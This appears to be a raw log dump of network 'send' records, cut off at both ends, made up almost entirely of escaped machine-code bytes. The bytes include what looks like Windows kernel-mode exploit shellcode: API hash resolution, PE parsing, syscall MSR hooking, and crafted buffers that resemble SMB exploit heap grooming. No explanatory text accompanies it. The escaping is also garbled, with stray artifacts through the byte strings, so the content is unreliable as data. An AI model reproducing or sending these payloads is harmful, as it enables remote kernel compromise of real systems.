\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\[email\u00a0protected]<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\[email\u00a0protected]\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\[email\u00a0protected]\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 11, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\[email\u00a0protected]\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\[email\u00a0protected]\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\[email\u00a0protected]\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\[email\u00a0protected]\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\[email\u00a0protected]\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\[email\u00a0protected]\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\[email\u00a0protected]\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\